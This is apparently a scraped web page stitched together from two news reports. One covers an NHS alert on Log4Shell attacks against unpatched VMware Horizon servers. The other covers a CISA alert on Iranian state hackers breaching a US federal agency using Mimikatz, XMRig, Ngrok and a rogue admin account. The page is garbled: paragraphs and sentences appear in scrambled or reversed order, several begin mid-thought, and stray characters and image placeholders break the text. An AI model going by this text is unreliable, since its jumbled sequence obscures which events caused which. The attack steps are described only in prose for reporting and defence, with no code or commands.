![]() These activities were used for various things, including deploying malicious software, exfiltrating data, or deploying ransomware.Īs mentioned earlier, the exploit is being conducted on VMware Horizon servers that have not been patched. After the initial attack was launched, a series of post-exploitation activities were also conducted. The web shell was then deployed, after which it served as a tool to be used in carrying out a variety of attacks. This file was later executed, such that it introduced a web shell into the VM Blast Secure Gateway service. In the alert, the NHS noted, “The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to callback to malicious infrastructure.”Īdditionally, the report stated that once the threat actor identified the weakness, they went ahead to use the Lightweight Directory Access Protocol (LDAP) to retrieve a malicious Java class file. ![]() As such, they conducted consecutive attacks on the servers. The report noted that an unknown threat actor was using the vulnerability to send malicious web shells and create a persistent attack mode. Unknown threat actors exploiting a flaw on VMware Horizon servers The digital security team at the NHS noted that the attackers were looking for unpatched flaws in VMware Horizon servers, with the threat actors behind the attack being unknown. The report notes that a threat actor is exploiting a flaw in these unpatched servers, noting that the threat actor behind the attack has not been identified. ![]() The agency also urges organizations to keep all software up-to-date, implement and prevent users from using known compromised passwords.The UK National Health Service (NHS) has issued a report on the Log4Shell vulnerabilities in VMware Horizon servers. CISA also said that organizations that haven’t yet patched VMware systems against Log4Shell should assume that they’ve already been breached and advises them to start hunting for malicious activity within their networks. Broad access to an organization’s network can be used for both espionage as well as launching destructive attacks.ĬISA, which has not attributed the breach to a particular advanced persistent threat (APT) group, shared indicators of compromise (IOCs) to help network defenders detect and protect against similar compromises. It’s not clear for what reason the hackers targeted the U.S. The attackers also changed the password for the local administrator account on several hosts as a backup should the rogue domain administrator account get detected and terminated. Using this newly created account, the hackers disabled Windows Defender and implanted Ngrok reverse proxies on several hosts in order to maintain their access in the future. The attackers also installed Mimikatz, an open source credential stealer, to harvest passwords and to create a new domain administrator account. Once inside the organizations’ network, CISA observed the threat actors installed XMRig, open source crypto mining software that is commonly abused by hackers for mining virtual currency on compromised computers. ![]() But this compromise happened even though CISA had ordered all federal civilian agencies to patch their systems affected by the Log4Shell vulnerability by December 23. VMware released security patches for Horizon servers in December. The agency found that the hackers had exploited Log4Shell, a critical zero-day vulnerability in the ubiquitous open source logging software Log4j, in an unpatched VMware Horizon server to gain initial access into the organization’s network with administrator and system-level access. In an alert published Thursday, the Cybersecurity and Infrastructure Security Agency said that a federal civilian executive branch organization (FCEB) was breached by Iranian government hackers earlier in February.ĬISA did not name the breached FCEB agency, a list that includes the likes of the Department of Homeland Security, the Department of the Treasury and the Federal Trade Commission, and CISA spokesperson Michael Feldman declined to answer our questions when reached by TechCrunch.ĬISA said it first observed the suspected activity on the unnamed federal agency’s network months later in April while conducting retrospective analysis using Einstein, a government-run intrusion detection system used to protect federal civilian agency networks. government’s cybersecurity agency says hackers backed by the Iranian government compromised a federal agency that failed to patch against Log4Shell, a vulnerability fixed almost a year ago. ![]()
0 Comments
Leave a Reply. |